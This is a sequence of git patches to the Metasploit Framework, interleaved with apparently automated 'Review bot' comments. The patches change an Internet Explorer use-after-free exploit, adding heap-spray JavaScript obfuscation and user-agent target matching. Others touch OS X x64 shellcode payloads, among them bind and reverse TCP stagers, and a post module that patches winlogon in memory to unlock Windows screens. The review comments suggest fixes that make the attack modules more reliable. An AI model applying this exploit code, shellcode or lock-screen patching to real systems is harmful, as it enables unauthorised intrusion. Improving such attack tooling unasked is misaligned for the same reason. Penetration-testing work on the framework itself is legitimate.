From: jvazquez-r7 Date: Mon, 24 Sep 2012 21:28:34 +0200 Subject: [PATCH 07/17] added js obfuscation for heap spray --- modules/exploits/windows/browser/ie_execcommand_uaf.rb | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb index c13609a069..aa7dac9eaa 100644 --- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb +++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb @@ -78,6 +78,12 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => false, 'DisclosureDate' => "Sep 14 2012", # When it was spotted in the wild by eromang 'DefaultTarget' => 0)) + + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) + ], self.class) + end def get_target(agent) @@ -283,6 +289,10 @@ class Metasploit3 < Msf::Exploit::Remote end js = heaplib(js, {:noobfu => true}) + if datastore['OBFUSCATE'] + js = ::Rex::Exploitation::JSObfu.new(js) + js.obfuscate + end html = <<-EOS From 25e6990dc73a4c520c8bccaf46bfe5576d4e9f23 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 24 Sep 2012 21:49:32 +0200 Subject: [PATCH 08/17] added osvdb reference --- modules/exploits/linux/http/zen_load_balancer_exec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb index fbf7cbe588..118ddfc133 100644 --- a/modules/exploits/linux/http/zen_load_balancer_exec.rb +++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb @@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ + ['OSVDB', '85654'], ['URL', 'http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/'] ], 'DefaultOptions' => From 2db2c780d62d28307226a11c692e93addd72f839 Mon Sep 17 00:00:00 2001 
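Review bot: After `js.obfuscate`, `js` is a `JSObfu` instance rather than a String, and the heredoc that follows relies on its implicit `to_s`; making that explicit with `js = js.to_s` after the `obfuscate` call keeps the variable's type stable for anything else that touches it. Separately, JSObfu renames the identifiers it can reach, so if the HTML template around this string calls a function defined in `js` by name (an onload handler, for instance — the template is outside this hunk, so I cannot confirm), the page breaks whenever OBFUSCATE is set unless those names are looked up through `js.sym(...)` after obfuscation. The option itself could note this in its description, e.g. `'Enable JavaScript obfuscation (randomizes identifiers)'`.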
From: sinn3r Date: Mon, 24 Sep 2012 17:38:19 -0500 Subject: [PATCH 09/17] Additional changes Updated get_target function, comment for original author, possible bug in handling page redirection. --- .../windows/browser/ie_execcommand_uaf.rb | 56 +++++++++++-------- 1 file changed, 32 insertions(+), 24 deletions(-) diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb index aa7dac9eaa..cb24f19783 100644 --- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb +++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'unknown', # Some secret ninja + 'unknown', # via ZDI 'eromang', # First public discovery 'binjo', 'sinn3r', # Metasploit 
@@ -90,21 +90,28 @@ class Metasploit3 < Msf::Exploit::Remote #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' - if agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ - return targets[1] #IE 7 on Windows XP SP3 - elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/ - return targets[2] #IE 8 on Windows XP SP3 - elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/ - return targets[3] #IE 7 on Windows Vista - elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8/ - return targets[4] #IE 8 on Windows Vista - elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/ - return targets[5] #IE 8 on Windows 7 - elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/ - return targets[6] #IE 9 on Windows 7 - else - return nil + nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' + ie = agent.scan(/MSIE (\d)/).flatten[0] || '' + + ie_name = "IE #{ie}" + + case nt + when '5.1' + os_name = 'Windows XP SP3' + when '6.0' + os_name = 'Windows Vista' + when '6.1' + os_name = 'Windows 7' end + + targets.each do |t| + if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) + vprint_status("Target selected as: #{t.name}") + return t + end + end + + return nil end def junk(n=4) @@ -294,7 +301,7 @@ class Metasploit3 < Msf::Exploit::Remote js.obfuscate end - html = <<-EOS + html = %Q| - EOS + | return html end @@ -345,10 +352,13 @@ class Metasploit3 < Msf::Exploit::Remote end def on_request_uri(cli, request) - print_status request.headers['User-Agent'] - agent = request.headers['User-Agent'] + uri = request.uri + agent = request.headers['User-Agent'] my_target = get_target(agent) + vprint_status("Requesting: #{uri}") + print_status(agent) + # Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? print_error("Browser not supported, sending a 404: #{agent.to_s}") 
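Review bot: When `nt` is non-empty but not one of the three `case` branches (NT 5.2 or NT 6.2, for example), `os_name` stays nil and `t.name.include?(os_name)` raises TypeError for any target whose name already matched `ie_name`, so `on_request_uri` dies instead of falling through to the 404 path; an `else os_name = ''` branch in the `case` restores the intended nil return. `/MSIE (\d)/` captures a single digit, so an `MSIE 10` agent is read as "IE 1"; `/MSIE (\d+)/` is the safer pattern. `agent` can also be nil when the request carries no User-Agent header, and `nil.scan` raises — `agent.to_s.scan(...)` on both lines avoids that. The `def get_target(agent)` line and the early `return target` guard lie before this hunk.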
@@ -356,15 +366,13 @@ class Metasploit3 < Msf::Exploit::Remote return end - vprint_status("Requesting: #{request.uri}") - - if request.uri =~ /#{@html2_name}/ + if uri =~ /#{@html2_name}/ print_status("Loading #{@html2_name}") html = load_html2 - elsif request.uri =~ /#{@html1_name}/ + elsif uri =~ /#{@html1_name}/ print_status("Loading #{@html1_name}") html = load_html1(cli, my_target) - elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/ + elsif uri =~ /\/$/ or (!this_resource.empty? and uri =~ /#{this_resource}$/) print_status("Redirecting to #{@html1_name}") send_redirect(cli, "#{this_resource}/#{@html1_name}") return From 2769a88f9e31513aa676618b4bcf45da8e54b549 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 24 Sep 2012 17:47:14 -0500 Subject: [PATCH 10/17] Code cleanup --- modules/payloads/singles/osx/x64/say.rb | 7 ++-- .../singles/osx/x64/shell_find_tag.rb | 9 ++--- modules/payloads/stagers/osx/x64/bind_tcp.rb | 34 ++++++------------- .../payloads/stagers/osx/x64/reverse_tcp.rb | 32 ++++++----------- .../payloads/stages/osx/x64/dupandexecve.rb | 4 --- 5 files changed, 26 insertions(+), 60 deletions(-) diff --git a/modules/payloads/singles/osx/x64/say.rb b/modules/payloads/singles/osx/x64/say.rb index 476097996b..61d7bb8b3a 100644 --- a/modules/payloads/singles/osx/x64/say.rb +++ b/modules/payloads/singles/osx/x64/say.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,8 @@ module Metasploit3 # build the shellcode payload dynamically based on the user-provided CMD def generate say = (datastore['SAY'] || '') << "\x00" - call = "\xe8" + [say.length + 0xd].pack('V') + call = "\xe8" + [say.length + 0xd].pack('V') + payload = "\x48\x31\xC0" + # xor rax,rax "\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b 
diff --git a/modules/payloads/singles/osx/x64/shell_find_tag.rb b/modules/payloads/singles/osx/x64/shell_find_tag.rb index 28fef6216b..885789552b 100644 --- a/modules/payloads/singles/osx/x64/shell_find_tag.rb +++ b/modules/payloads/singles/osx/x64/shell_find_tag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -45,8 +41,9 @@ module Metasploit3 # ensures the setting of tag to a four byte value # def generate - cmd = (datastore['CMD'] || '') << "\x00" - call = "\xe8" + [cmd.length].pack('V') + cmd = (datastore['CMD'] || '') << "\x00" + call = "\xe8" + [cmd.length].pack('V') + payload = "\x48\x31\xFF" + # xor rdi,rdi "\x57" + # push rdi diff --git a/modules/payloads/stagers/osx/x64/bind_tcp.rb b/modules/payloads/stagers/osx/x64/bind_tcp.rb index 4390b1b41c..94c8e74529 100644 --- a/modules/payloads/stagers/osx/x64/bind_tcp.rb +++ b/modules/payloads/stagers/osx/x64/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit 
@@ -12,30 +8,22 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -### -# -# BindTcp -# ------- -# -# Mac OS X x86 bind TCP stager. -# -### module Metasploit3 include Msf::Payload::Stager def initialize(info = { }) super(merge_info(info, - 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', - 'Description' => 'Listen, read length, read buffer, execute', - 'Author' => 'nemo ', - 'License' => MSF_LICENSE, - 'Platform' => 'osx', - 'Arch' => ARCH_X86_64, - 'Handler' => Msf::Handler::BindTcp, - 'Convention' => 'sockedi', - 'Stager' => + 'Name' => 'Bind TCP Stager', + 'Version' => '$Revision$', + 'Description' => 'Listen, read length, read buffer, execute', + 'Author' => 'nemo ', + 'License' => MSF_LICENSE, + 'Platform' => 'osx', + 'Arch' => ARCH_X86_64, + 'Handler' => Msf::Handler::BindTcp, + 'Convention' => 'sockedi', + 'Stager' => { 'Offsets' => { 'LPORT' => [ 31, 'n'] }, 'Payload' => @@ -93,7 +81,7 @@ module Metasploit3 "\x56" + # push rsi "\x4C\x89\xEF" + # mov rdi,r13 "\x48\x31\xC9" + # xor rcx,rcx - "\x4C\x89\xDA" + # mov rdx,r11 + "\x4C\x89\xDA" + # mov rdx,r11 "\x4D\x31\xC0" + # xor r8,r8 "\x4D\x31\xD2" + # xor r10,r10 "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d diff --git a/modules/payloads/stagers/osx/x64/reverse_tcp.rb b/modules/payloads/stagers/osx/x64/reverse_tcp.rb index 02585e916e..5a78df166d 100644 --- a/modules/payloads/stagers/osx/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/x64/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit 
@@ -12,30 +8,22 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -### -# -# ReverseTcp -# ------- -# -# Mac OS X x86 Reverse TCP stager. -# -### module Metasploit3 include Msf::Payload::Stager def initialize(info = { }) super(merge_info(info, - 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', - 'Description' => 'Connect, read length, read buffer, execute', - 'Author' => 'nemo ', - 'License' => MSF_LICENSE, - 'Platform' => 'osx', - 'Arch' => ARCH_X86_64, - 'Handler' => Msf::Handler::ReverseTcp, - 'Convention' => 'sockedi', - 'Stager' => + 'Name' => 'Reverse TCP Stager', + 'Version' => '$Revision$', + 'Description' => 'Connect, read length, read buffer, execute', + 'Author' => 'nemo ', + 'License' => MSF_LICENSE, + 'Platform' => 'osx', + 'Arch' => ARCH_X86_64, + 'Handler' => Msf::Handler::ReverseTcp, + 'Convention' => 'sockedi', + 'Stager' => { 'Offsets' => { diff --git a/modules/payloads/stages/osx/x64/dupandexecve.rb b/modules/payloads/stages/osx/x64/dupandexecve.rb index afe727791d..ddbfba85bf 100644 --- a/modules/payloads/stages/osx/x64/dupandexecve.rb +++ b/modules/payloads/stages/osx/x64/dupandexecve.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit From c0387f1441ad82b28c6c3786d1324bdf039e0faf Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 24 Sep 2012 18:33:13 -0500 Subject: [PATCH 11/17] Have a matching option like the post module And make sure nemo won't get harassed by people because they think he hacked into everyone's mac. --- modules/payloads/singles/osx/x64/say.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/singles/osx/x64/say.rb b/modules/payloads/singles/osx/x64/say.rb index 61d7bb8b3a..71473b145c 100644 --- a/modules/payloads/singles/osx/x64/say.rb +++ b/modules/payloads/singles/osx/x64/say.rb 
@@ -26,13 +26,13 @@ module Metasploit3 # exec payload options register_options( [ - OptString.new('SAY', [ true, "The string to say", "owned by nemo"]), + OptString.new('TEXT', [ true, "The text to say", "Hello\!"]), ], self.class) end # build the shellcode payload dynamically based on the user-provided CMD def generate - say = (datastore['SAY'] || '') << "\x00" + say = (datastore['TEXT'] || '') << "\x00" call = "\xe8" + [say.length + 0xd].pack('V') payload = From 6bd450e114e54c1dead15e3bc75a116385987532 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 24 Sep 2012 18:49:41 -0500 Subject: [PATCH 12/17] Make Ruby 1.8 happy --- modules/auxiliary/admin/http/scrutinizer_add_user.rb | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/admin/http/scrutinizer_add_user.rb b/modules/auxiliary/admin/http/scrutinizer_add_user.rb index 08e16962c6..0e6ec2c3df 100644 --- a/modules/auxiliary/admin/http/scrutinizer_add_user.rb +++ b/modules/auxiliary/admin/http/scrutinizer_add_user.rb @@ -6,7 +6,6 @@ ## require 'msf/core' -require 'json' class Metasploit3 < Msf::Auxiliary @@ -45,7 +44,6 @@ class Metasploit3 < Msf::Auxiliary ], self.class) end - def run res = send_request_cgi({ 'method' => 'POST', @@ -64,6 +62,15 @@ class Metasploit3 < Msf::Auxiliary end begin + require 'json' + rescue LoadError + print_error("Json is not available on your machine") + return + end + + begin + require 'json' + j = JSON.parse(res.body) if j['error'] @@ -78,7 +85,6 @@ class Metasploit3 < Msf::Auxiliary rescue JSON::ParserError print_error("Unable to parse JSON") print_line(res.body) - end end From 54ed60e24e7f1725bbf8da1e51f02f80910fdb4a Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 24 Sep 2012 18:50:53 -0500 Subject: [PATCH 13/17] Forgot to remove the second require --- modules/auxiliary/admin/http/scrutinizer_add_user.rb | 2 -- 1 file changed, 2 deletions(-) 
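Review bot: `(datastore['TEXT'] || '') << "\x00"` appends in place to the object the datastore returns; if that is the stored String itself (as it is for a Hash-backed datastore — worth confirming), every call to `generate` appends another NUL to the option value, so repeated generation keeps growing the payload. `say = (datastore['TEXT'] || '') + "\x00"` builds a fresh string and avoids the mutation. The comment above `generate` still says "based on the user-provided CMD" and should now say TEXT. In `"Hello\!"` the backslash is a no-op escape in a double-quoted string; `"Hello!"` is the same value.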
diff --git a/modules/auxiliary/admin/http/scrutinizer_add_user.rb b/modules/auxiliary/admin/http/scrutinizer_add_user.rb index 0e6ec2c3df..64e4396a62 100644 --- a/modules/auxiliary/admin/http/scrutinizer_add_user.rb +++ b/modules/auxiliary/admin/http/scrutinizer_add_user.rb @@ -69,8 +69,6 @@ class Metasploit3 < Msf::Auxiliary end begin - require 'json' - j = JSON.parse(res.body) if j['error'] From 4cd244693ff2c00793df21f7f350bc6c0f576aec Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 24 Sep 2012 19:13:44 -0500 Subject: [PATCH 14/17] Tabs --- modules/post/windows/gather/enum_db.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/post/windows/gather/enum_db.rb b/modules/post/windows/gather/enum_db.rb index 2d34e528ae..18f5b492b7 100644 --- a/modules/post/windows/gather/enum_db.rb +++ b/modules/post/windows/gather/enum_db.rb @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Post print_status("\tMicrosoft SQL Server found.") return true end - return false + return false rescue return false end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Post print_status("\tOracle Server found.") return true end - return false + return false rescue return false end @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Post print_status("\tDB2 Server found.") return true end - return false + return false rescue return false end @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Post print_status("\tMySQL Server found.") return true end - return false + return false rescue return false end @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Post print_status("\tSybase Server found.") return true end - return false + return false rescue return false end From 67c5c24f6751ce57753ec949401d982bc510453a Mon Sep 17 00:00:00 2001 
From: sinn3r Date: Mon, 24 Sep 2012 22:32:59 -0500 Subject: [PATCH 15/17] Fix multiple bugs Bug fixes including: * Unnecessary headers being manually added. Sometimes may cause a 400 Bad Request against specific web servers. See issue 7165 on Redmine for details. * Regex fix * URI path fix --- .../auxiliary/fuzzers/http/http_form_field.rb | 34 +++++-------------- 1 file changed, 9 insertions(+), 25 deletions(-) diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb index 0ca9e4b3fd..5b6e2e2c1f 100644 --- a/modules/auxiliary/fuzzers/http/http_form_field.rb +++ b/modules/auxiliary/fuzzers/http/http_form_field.rb @@ -25,10 +25,10 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'HTTP Form Field Fuzzer', 'Description' => %q{ - This module will grab all fields from a form, - and launch a series of POST actions, fuzzing the contents - of the form fields. You can optionally fuzz headers too - (option is enabled by default) + This module will grab all fields from a form, + and launch a series of POST actions, fuzzing the contents + of the form fields. You can optionally fuzz headers too + (option is enabled by default) }, 'Author' => [ 'corelanc0d3r', 
@@ -69,28 +69,12 @@ class Metasploit3 < Msf::Auxiliary proto = "https://" end - useragent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" - if datastore['UserAgent'] != nil - if datastore['UserAgent'].length > 0 - useragent = datastore['UserAgent'] - end - end - - host = datastore['RHOST'] - if datastore['VHOST'] - if datastore['VHOST'].length > 0 - host = datastore['VHOST'] - end - end - @send_data = { :uri => '', :version => '1.1', :method => 'POST', :headers => { 'Content-Length' => 100, - 'Host' => host, - 'User-Agent' => useragent, 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language' => 'en-us,en;q=0.5', 'Accept-Encoding' => 'gzip,deflate', @@ -98,12 +82,10 @@ class Metasploit3 < Msf::Auxiliary 'Keep-Alive' => '300', 'Connection' => 'keep-alive', 'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s, - 'Content-Type' => 'application/x-www-form-urlencoded', + 'Content-Type' => 'application/x-www-form-urlencoded' } } @get_data_headers = { - 'Host' => host, - 'User-Agent' => useragent, 'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s, } end @@ -272,6 +254,8 @@ class Metasploit3 < Msf::Auxiliary end datastr=datastr[0,datastr.length-1] @send_data[:uri] = form[:action] + @send_data[:uri] = "/#{form[:action]}" if @send_data[:uri][0,1] != '/' + @send_data[:method] = form[:method].upcase response = send_fuzz(@send_data,datastr) if not process_response(response,field,"field") @@ -322,7 +306,7 @@ class Metasploit3 < Msf::Auxiliary end def get_field_val(input) - tmp = input.split(/=/) + tmp = input.split(/\=/) #get delimeter tmp2 = tmp[1].strip delim = tmp2[0,1] 
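Review bot: In the `@@ -272,6 +254,8 @@` hunk, `form[:method].upcase` raises NoMethodError when the form tag carries no `method` attribute, which HTML treats as GET; unless the form parser (outside this hunk) already fills in a default, `@send_data[:method] = (form[:method] || 'GET').upcase` is the safe form. The new `"/#{form[:action]}"` prefix also turns an absolute `action` such as `http://host/path` into `/http://host/path`; if absolute actions are possible here they should be reduced to their path first (for example via `URI.parse(form[:action]).request_uri`) before the leading-slash check. The enclosing method starts before this hunk.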
@@ -435,7 +419,7 @@ class Metasploit3 < Msf::Auxiliary
 location = fielddata[0].index(thisfield)
 delta = fielddata[0].size - location
 remaining = fielddata[0][location,delta]
- tmp = remaining.strip.split(/=/)
+ tmp = remaining.strip.split(/\=/)
 if tmp.size > 1
 delim = tmp[1][0,1]
 tmp2 = tmp[1].split(delim)
From 6939df8d98c22a4c240a5cb70dfe4e0b2b4b8bb9 Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Mon, 24 Sep 2012 22:42:17 -0500
Subject: [PATCH 16/17] Support Spanish thx to Adrian Pulido

See redmine feature: #7006

---
 modules/post/windows/escalate/screen_unlock.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/post/windows/escalate/screen_unlock.rb b/modules/post/windows/escalate/screen_unlock.rb
index c3446babf7..413741c2af 100644
--- a/modules/post/windows/escalate/screen_unlock.rb
+++ b/modules/post/windows/escalate/screen_unlock.rb
@@ -62,7 +62,8 @@ class Metasploit3 < Msf::Post
 { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb76a, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb827, :os => /Windows Vista/ },
 { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb391, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb44e, :os => /Windows Vista/ },
 { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xacf6, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xadb3, :os => /Windows Vista/ },
- { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ }
+ { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ },
+ { :sig => "8bff558bec83ec50a1", :sigoffset => 0x97d3, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x9878, :os => /Windows XP.*Service Pack 3 - spanish/ }
 ]

 unsupported if client.platform !~ /win32|win64/i
From 1111de0197fb79555676b3608fefd9976b41fd6d Mon Sep 17 00:00:00 2001
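Review bot: `remaining.strip.split(/\=/)` is byte-for-byte equivalent to the `split(/=/)` it replaces — `=` is not a regex metacharacter — so the "Regex fix" in the commit message changes nothing in this hunk. If the intent was to survive `=` inside an attribute value (base64 padding in a `value="..."`, say), `tmp = remaining.strip.split(/=/, 2)` keeps the value intact, since `tmp[1]` is then delimited by the quote character picked up on the following line rather than cut at the next `=`. The surrounding method begins before this hunk.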
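Review bot: The new signature entry only fires when the OS string it is matched against ends with `- spanish`; if that string is Meterpreter's `sysinfo['OS']` (the matching code is outside this hunk, so I cannot confirm), it normally carries no language suffix and this entry would never be selected. Confirm where that string comes from, and if the language is exposed as a separate field, match on it there instead of encoding it into the `:os` regex. A short comment on the entry, e.g. `# XP SP3, Spanish build — different winlogon layout`, would also explain why its `:sig` differs from the English entries.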
From: sinn3r
Date: Tue, 25 Sep 2012 01:19:58 -0500
Subject: [PATCH 17/17] Add OSVDB reference

---
 modules/exploits/multi/http/auxilium_upload_exec.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/exploits/multi/http/auxilium_upload_exec.rb b/modules/exploits/multi/http/auxilium_upload_exec.rb
index 0dc0a5341a..3d8f1ad57d 100644
--- a/modules/exploits/multi/http/auxilium_upload_exec.rb
+++ b/modules/exploits/multi/http/auxilium_upload_exec.rb
@@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
 ],
 'References' =>
 [
+ ['OSVDB', '85554'],
 ['EDB', '21329']
 ],
 'Payload' =>